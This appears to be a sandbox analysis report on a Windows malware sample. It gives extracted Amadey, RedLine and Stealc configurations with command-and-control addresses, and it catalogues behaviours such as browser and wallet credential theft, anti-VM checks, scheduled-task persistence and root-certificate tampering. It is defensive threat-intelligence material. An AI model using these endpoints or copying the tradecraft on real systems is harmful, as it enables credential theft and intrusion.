Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-08-2024 13:55
Static task
static1
Behavioral task
behavioral1
Sample
10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe
Resource
win11-20240802-en
General
-
Target
10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe
-
Size
1.8MB
-
MD5
8632e9a6602cdbc2bb7de2c841caad4f
-
SHA1
4ed2d0983c9564f7712da8799e2cf5a92620744c
-
SHA256
10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87
-
SHA512
9d1f17e186fd27fce1121662a06218381226eba89f053e86305a33cd5c5399cfd6397d359e804bc866d001d141ccff2a1e9601bae04493977da1ff3e5349bf01
-
SSDEEP
49152:ozPfDBE11bFc7l8ICW7qxxezhIew6hFJKzQcu6FXLEB0MFuQf:oznS1FFslH6xuyOal1oBp0W
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
95.179.163.21:29257
Extracted
redline
@CLOUDYTTEAM
65.21.18.51:45580
Extracted
stealc
default
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
redline
14082024
185.215.113.67:21405
Extracted
redline
816FA
88.99.151.68:7200
Extracted
amadey
4.41
a51500
http://api.garageserviceoperation.com
-
install_dir
0cf505a27f
-
install_file
ednfovi.exe
-
strings_key
0044a8b8e295529eaf3743c9bc3171d2
-
url_paths
/CoreOPT/index.php
Extracted
redline
TG@CVV88888
185.218.125.157:21441
Signatures
-
Detects ZharkBot payload 1 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral2/files/0x000100000002a9db-526.dat zharkcore -
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral2/memory/1256-43-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral2/files/0x000100000002a975-110.dat family_redline behavioral2/memory/1008-120-0x0000000000DF0000-0x0000000000E42000-memory.dmp family_redline behavioral2/files/0x000100000002a98e-252.dat family_redline behavioral2/memory/4384-266-0x00000000006A0000-0x00000000006F2000-memory.dmp family_redline behavioral2/memory/3404-465-0x0000000000600000-0x0000000000652000-memory.dmp family_redline behavioral2/memory/3992-881-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 816 created 3252 816 Beijing.pif 53 PID 816 created 3252 816 Beijing.pif 53 PID 4800 created 3252 4800 Cultures.pif 53 -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ df01241e40.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4320 netsh.exe 1856 netsh.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion df01241e40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion df01241e40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1412 cmd.exe 2984 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url cmd.exe -
Executes dropped EXE 37 IoCs
pid Process 2976 axplong.exe 4600 GOLD.exe 3856 crypteda.exe 8 Gbgh4HRl1M.exe 1008 chRIf5vxYz.exe 2520 setup2.exe 3332 stealc_default.exe 768 axplong.exe 2360 clcs.exe 4384 14082024.exe 1412 BattleGermany.exe 1964 Community.pif 4816 runtime.exe 816 Beijing.pif 1848 coreplugin.exe 4800 Cultures.pif 4344 Indentif.exe 1688 kitty.exe 748 LummaC22222.exe 2780 build2.exe 3336 contorax.exe 4932 winmsbt.exe 4516 Cultures.pif 3528 axplong.exe 2348 3546345.exe 840 Hkbsse.exe 3412 df01241e40.exe 3528 meta.exe 1648 5PHCENYBS068Y01.exe 2064 stub.exe 4652 2.exe 3920 Sеtuр111.exe 4308 surfex.exe 4184 Channel1.exe 1336 Channel1.exe 1064 Hkbsse.exe 3796 axplong.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine df01241e40.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe Key opened \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Wine axplong.exe -
Loads dropped DLL 35 IoCs
pid Process 3332 stealc_default.exe 3332 stealc_default.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 2064 stub.exe 4652 2.exe 2064 stub.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" winmsbt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 36 raw.githubusercontent.com 21 pastebin.com 21 raw.githubusercontent.com 23 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
pid Process 2756 cmd.exe 5096 ARP.EXE -
Enumerates processes with tasklist 1 TTPs 10 IoCs
pid Process 5100 tasklist.exe 4336 tasklist.exe 3100 tasklist.exe 3900 tasklist.exe 2596 tasklist.exe 1188 tasklist.exe 2260 tasklist.exe 4408 tasklist.exe 5024 tasklist.exe 1252 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2524 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 2976 axplong.exe 768 axplong.exe 3528 axplong.exe 3412 df01241e40.exe 3796 axplong.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4600 set thread context of 1256 4600 GOLD.exe 82 PID 3856 set thread context of 4384 3856 crypteda.exe 88 PID 4800 set thread context of 4516 4800 Cultures.pif 152 PID 3528 set thread context of 2996 3528 meta.exe 196 PID 4652 set thread context of 4184 4652 2.exe 215 PID 4308 set thread context of 3992 4308 surfex.exe 289 -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe File opened for modification C:\Windows\SysOrleans runtime.exe File opened for modification C:\Windows\HostelGalleries runtime.exe File opened for modification C:\Windows\ConfiguringUps runtime.exe File opened for modification C:\Windows\ExplorerProprietary runtime.exe File created C:\Windows\Tasks\Hkbsse.job build2.exe File opened for modification C:\Windows\ChestAntique runtime.exe File opened for modification C:\Windows\EquationExplorer runtime.exe File opened for modification C:\Windows\TreeProfessor runtime.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 976 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 34 IoCs
pid pid_target Process procid_target 4972 2520 WerFault.exe 92 4380 2360 WerFault.exe 99 3332 1688 WerFault.exe 154 3760 4516 WerFault.exe 152 1864 4516 WerFault.exe 152 3516 748 WerFault.exe 157 488 2780 WerFault.exe 158 4292 2780 WerFault.exe 158 4172 2780 WerFault.exe 158 1412 2780 WerFault.exe 158 396 2780 WerFault.exe 158 3016 2780 WerFault.exe 158 3896 2780 WerFault.exe 158 4896 2780 WerFault.exe 158 592 2780 WerFault.exe 158 2516 2780 WerFault.exe 158 1676 2780 WerFault.exe 158 5000 4184 WerFault.exe 215 4632 840 WerFault.exe 188 2360 840 WerFault.exe 188 2232 840 WerFault.exe 188 2344 840 WerFault.exe 188 424 840 WerFault.exe 188 4900 840 WerFault.exe 188 2692 840 WerFault.exe 188 4492 840 WerFault.exe 188 656 840 WerFault.exe 188 1364 840 WerFault.exe 188 1480 840 WerFault.exe 188 2796 840 WerFault.exe 188 4752 840 WerFault.exe 188 1620 3920 WerFault.exe 261 4504 4184 WerFault.exe 312 3756 1064 WerFault.exe 322 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3546345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LummaC22222.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sеtuр111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cultures.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cultures.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df01241e40.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Channel1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BattleGermany.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Community.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kitty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language surfex.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 14082024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Beijing.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypteda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language coreplugin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GOLD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chRIf5vxYz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gbgh4HRl1M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language clcs.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3756 cmd.exe 4396 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 2848 NETSTAT.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup2.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString clcs.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Sеtuр111.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Sеtuр111.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Channel1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Channel1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 clcs.exe -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 4888 WMIC.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4352 WMIC.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3708 ipconfig.exe 2848 NETSTAT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3180 systeminfo.exe -
Kills process with taskkill 1 IoCs
pid Process 2180 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 956 schtasks.exe 1292 schtasks.exe 2928 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 2976 axplong.exe 2976 axplong.exe 3332 stealc_default.exe 3332 stealc_default.exe 8 Gbgh4HRl1M.exe 1256 RegAsm.exe 1256 RegAsm.exe 1256 RegAsm.exe 1256 RegAsm.exe 1008 chRIf5vxYz.exe 768 axplong.exe 768 axplong.exe 1008 chRIf5vxYz.exe 1008 chRIf5vxYz.exe 1008 chRIf5vxYz.exe 1008 chRIf5vxYz.exe 1256 RegAsm.exe 3332 stealc_default.exe 3332 stealc_default.exe 4384 14082024.exe 4384 14082024.exe 4384 14082024.exe 4384 14082024.exe 4384 14082024.exe 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 1964 Community.pif 816 Beijing.pif 816 Beijing.pif 816 Beijing.pif 816 Beijing.pif -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 8 Gbgh4HRl1M.exe Token: SeBackupPrivilege 8 Gbgh4HRl1M.exe Token: SeSecurityPrivilege 8 Gbgh4HRl1M.exe Token: SeSecurityPrivilege 8 Gbgh4HRl1M.exe Token: SeSecurityPrivilege 8 Gbgh4HRl1M.exe Token: SeSecurityPrivilege 8 Gbgh4HRl1M.exe Token: SeDebugPrivilege 1008 chRIf5vxYz.exe Token: SeDebugPrivilege 1256 RegAsm.exe Token: SeDebugPrivilege 4384 14082024.exe Token: SeDebugPrivilege 2260 tasklist.exe Token: SeDebugPrivilege 4408 tasklist.exe Token: SeDebugPrivilege 5024 tasklist.exe Token: SeDebugPrivilege 4336 tasklist.exe Token: SeDebugPrivilege 3100 tasklist.exe Token: SeDebugPrivilege 5100 tasklist.exe Token: SeDebugPrivilege 3336 contorax.exe Token: SeDebugPrivilege 4932 winmsbt.exe Token: SeDebugPrivilege 3528 meta.exe Token: SeDebugPrivilege 2996 jsc.exe Token: SeBackupPrivilege 2996 jsc.exe Token: SeSecurityPrivilege 2996 jsc.exe Token: SeSecurityPrivilege 2996 jsc.exe Token: SeSecurityPrivilege 2996 jsc.exe Token: SeSecurityPrivilege 2996 jsc.exe Token: SeDebugPrivilege 3900 tasklist.exe Token: SeIncreaseQuotaPrivilege 4352 WMIC.exe Token: SeSecurityPrivilege 4352 WMIC.exe Token: SeTakeOwnershipPrivilege 4352 WMIC.exe Token: SeLoadDriverPrivilege 4352 WMIC.exe Token: SeSystemProfilePrivilege 4352 WMIC.exe Token: SeSystemtimePrivilege 4352 WMIC.exe Token: SeProfSingleProcessPrivilege 4352 WMIC.exe Token: SeIncBasePriorityPrivilege 4352 WMIC.exe Token: SeCreatePagefilePrivilege 4352 WMIC.exe Token: SeBackupPrivilege 4352 WMIC.exe Token: SeRestorePrivilege 4352 WMIC.exe Token: SeShutdownPrivilege 4352 WMIC.exe Token: SeDebugPrivilege 4352 WMIC.exe Token: SeSystemEnvironmentPrivilege 4352 WMIC.exe Token: SeRemoteShutdownPrivilege 4352 WMIC.exe Token: SeUndockPrivilege 4352 WMIC.exe Token: SeManageVolumePrivilege 4352 WMIC.exe Token: 33 4352 WMIC.exe Token: 34 4352 WMIC.exe Token: 35 4352 WMIC.exe Token: 36 4352 WMIC.exe Token: SeIncreaseQuotaPrivilege 4160 WMIC.exe Token: SeSecurityPrivilege 4160 WMIC.exe Token: SeTakeOwnershipPrivilege 4160 WMIC.exe Token: SeLoadDriverPrivilege 4160 WMIC.exe Token: SeSystemProfilePrivilege 4160 WMIC.exe Token: SeSystemtimePrivilege 4160 WMIC.exe Token: SeProfSingleProcessPrivilege 4160 WMIC.exe Token: SeIncBasePriorityPrivilege 4160 WMIC.exe Token: SeCreatePagefilePrivilege 4160 WMIC.exe Token: SeBackupPrivilege 4160 WMIC.exe Token: SeRestorePrivilege 4160 WMIC.exe Token: SeShutdownPrivilege 4160 WMIC.exe Token: SeDebugPrivilege 4160 WMIC.exe Token: SeSystemEnvironmentPrivilege 4160 WMIC.exe Token: 